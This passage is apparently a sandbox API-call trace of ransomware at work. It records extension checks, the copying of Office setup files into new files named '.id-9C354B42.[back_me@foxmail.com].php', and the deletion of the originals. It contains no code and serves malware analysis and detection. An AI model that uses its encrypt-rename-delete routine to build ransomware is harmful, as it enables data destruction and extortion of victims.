lstrlenW (lpString=".zip") returned 4 [0040.644] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.644] lstrlenW (lpString=".rar") returned 4 [0040.644] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.644] lstrlenW (lpString=".bz2") returned 4 [0040.644] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.644] lstrlenW (lpString=".7z") returned 3 [0040.644] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.644] lstrlenW (lpString=".dbf") returned 4 [0040.644] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.644] lstrlenW (lpString=".1cd") returned 4 [0040.644] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.644] lstrlenW (lpString=".jpg") returned 4 [0040.644] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.644] lstrlenW (lpString=".doc") returned 4 [0040.644] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0040.644] lstrlenW (lpString=".docx") returned 5 [0040.644] lstrcmpiW (lpString1=".docx", lpString2="R.CHM") returned -1 [0040.645] lstrlenW (lpString=".pdf") returned 4 [0040.645] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0040.645] lstrlenW (lpString=".xls") returned 4 [0040.645] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0040.645] lstrlenW (lpString=".xlsx") returned 5 [0040.645] lstrcmpiW (lpString1=".xlsx", lpString2="R.CHM") returned -1 [0040.645] lstrlenW (lpString=".ppt") returned 4 [0040.645] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0040.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.645] lstrlenW (lpString=".zip") returned 4 [0040.645] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0040.645] lstrlenW (lpString=".rar") returned 4 [0040.645] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0040.645] lstrlenW (lpString=".bz2") returned 4 [0040.645] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0040.645] lstrlenW (lpString=".7z") returned 3 [0040.645] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0040.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.645] lstrlenW (lpString=".dbf") returned 4 [0040.645] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0040.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.645] lstrlenW (lpString=".1cd") returned 4 [0040.645] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0040.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103 [0040.645] lstrlenW (lpString=".jpg") returned 4 [0040.645] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0040.645] lstrcmpiW (lpString1=".CHM", lpString2=".php") returned -1 [0040.645] lstrlenW (lpString="SETUP.CHM") returned 9 [0040.645] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.455] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=67190) returned 1 [0041.455] CloseHandle (hObject=0x1bc) returned 1 [0041.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm")) returned 0x20 [0041.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.455] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.455] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.455] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.455] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.455] GetLastError () returned 0x0 [0041.455] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x10676, lpOverlapped=0x0) returned 1 [0041.458] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x10680, lpOverlapped=0x0) returned 1 [0041.460] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.460] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.460] SetEndOfFile (hFile=0x1b4) returned 1 [0041.460] CloseHandle (hObject=0x1b4) returned 1 [0041.461] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.461] SetEndOfFile (hFile=0x1bc) returned 1 [0041.462] CloseHandle (hObject=0x1bc) returned 1 [0041.462] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.462] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm")) returned 1 [0041.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0041.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0041.463] lstrlenW (lpString=".doc") returned 4 [0041.463] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0041.463] lstrlenW (lpString=".docx") returned 5 [0041.463] lstrcmpiW (lpString1=".docx", lpString2="P.CHM") returned -1 [0041.463] lstrlenW (lpString=".pdf") returned 4 [0041.463] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0041.463] lstrlenW (lpString=".xls") returned 4 [0041.463] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0041.463] lstrlenW (lpString=".xlsx") returned 5 [0041.463] lstrcmpiW (lpString1=".xlsx", lpString2="P.CHM") returned -1 [0041.463] lstrlenW (lpString=".ppt") returned 4 [0041.463] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0041.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0041.463] lstrlenW (lpString=".zip") returned 4 [0041.463] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0041.463] lstrlenW (lpString=".rar") returned 4 [0041.463] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0041.463] lstrlenW (lpString=".bz2") returned 4 [0041.463] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0041.463] lstrlenW (lpString=".7z") returned 3 [0041.463] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0041.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0041.463] lstrlenW (lpString=".dbf") returned 4 [0041.463] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0041.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0041.463] lstrlenW (lpString=".1cd") returned 4 [0041.463] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0041.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0041.464] lstrlenW (lpString=".jpg") returned 4 [0041.464] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0041.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0041.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0041.464] lstrlenW (lpString=".doc") returned 4 [0041.464] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0041.464] lstrlenW (lpString=".docx") returned 5 [0041.464] lstrcmpiW (lpString1=".docx", lpString2="P.CHM") returned -1 [0041.464] lstrlenW (lpString=".pdf") returned 4 [0041.464] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0041.464] lstrlenW (lpString=".xls") returned 4 [0041.464] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0041.464] lstrlenW (lpString=".xlsx") returned 5 [0041.464] lstrcmpiW (lpString1=".xlsx", lpString2="P.CHM") returned -1 [0041.464] lstrlenW (lpString=".ppt") returned 4 [0041.464] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0041.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0041.464] lstrlenW (lpString=".zip") returned 4 [0041.464] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0041.464] lstrlenW (lpString=".rar") returned 4 [0041.464] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0041.464] lstrlenW (lpString=".bz2") returned 4 [0041.464] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0041.464] lstrlenW (lpString=".7z") returned 3 [0041.464] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0041.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0041.464] lstrlenW (lpString=".dbf") returned 4 [0041.464] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0041.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0041.464] lstrlenW (lpString=".1cd") returned 4 [0041.464] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0041.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102 [0041.464] lstrlenW (lpString=".jpg") returned 4 [0041.464] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0041.465] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.465] lstrlenW (lpString="OutlookMUI.XML") returned 14 [0041.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.465] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=3186) returned 1 [0041.465] CloseHandle (hObject=0x1bc) returned 1 [0041.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 0x20 [0041.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.465] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.465] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.467] GetLastError () returned 0x0 [0041.467] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xc72, lpOverlapped=0x0) returned 1 [0041.469] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xc80, lpOverlapped=0x0) returned 1 [0041.469] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.469] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0041.470] SetEndOfFile (hFile=0x1b4) returned 1 [0041.470] CloseHandle (hObject=0x1b4) returned 1 [0041.470] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.470] SetEndOfFile (hFile=0x1bc) returned 1 [0041.471] CloseHandle (hObject=0x1bc) returned 1 [0041.471] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.471] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 1 [0041.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0041.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0041.472] lstrlenW (lpString=".doc") returned 4 [0041.472] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString=".docx") returned 5 [0041.472] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.472] lstrlenW (lpString=".pdf") returned 4 [0041.472] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString=".xls") returned 4 [0041.472] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString=".xlsx") returned 5 [0041.472] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.472] lstrlenW (lpString=".ppt") returned 4 [0041.472] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0041.472] lstrlenW (lpString=".zip") returned 4 [0041.472] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.472] lstrlenW (lpString=".rar") returned 4 [0041.472] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString=".bz2") returned 4 [0041.472] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString=".7z") returned 3 [0041.472] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0041.472] lstrlenW (lpString=".dbf") returned 4 [0041.472] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0041.472] lstrlenW (lpString=".1cd") returned 4 [0041.472] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0041.472] lstrlenW (lpString=".jpg") returned 4 [0041.472] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0041.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0041.473] lstrlenW (lpString=".doc") returned 4 [0041.473] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.473] lstrlenW (lpString=".docx") returned 5 [0041.473] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.473] lstrlenW (lpString=".pdf") returned 4 [0041.473] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.473] lstrlenW (lpString=".xls") returned 4 [0041.473] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.473] lstrlenW (lpString=".xlsx") returned 5 [0041.473] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.473] lstrlenW (lpString=".ppt") returned 4 [0041.473] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0041.473] lstrlenW (lpString=".zip") returned 4 [0041.473] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.473] lstrlenW (lpString=".rar") returned 4 [0041.473] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.473] lstrlenW (lpString=".bz2") returned 4 [0041.473] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.473] lstrlenW (lpString=".7z") returned 3 [0041.473] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0041.473] lstrlenW (lpString=".dbf") returned 4 [0041.473] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0041.473] lstrlenW (lpString=".1cd") returned 4 [0041.473] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108 [0041.473] lstrlenW (lpString=".jpg") returned 4 [0041.473] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.473] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.474] lstrlenW (lpString="SETUP.XML") returned 9 [0041.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.475] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=4207) returned 1 [0041.475] CloseHandle (hObject=0x1bc) returned 1 [0041.475] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 0x20 [0041.475] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0041.475] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.475] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.476] GetLastError () returned 0x0 [0041.476] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x106f, lpOverlapped=0x0) returned 1 [0041.477] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x1070, lpOverlapped=0x0) returned 1 [0041.478] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.478] WriteFile (in: hFile=0x1b4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.478] SetEndOfFile (hFile=0x1b4) returned 1 [0041.478] CloseHandle (hObject=0x1b4) returned 1 [0041.479] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.479] SetEndOfFile (hFile=0x1bc) returned 1 [0041.479] CloseHandle (hObject=0x1bc) returned 1 [0041.480] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.480] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 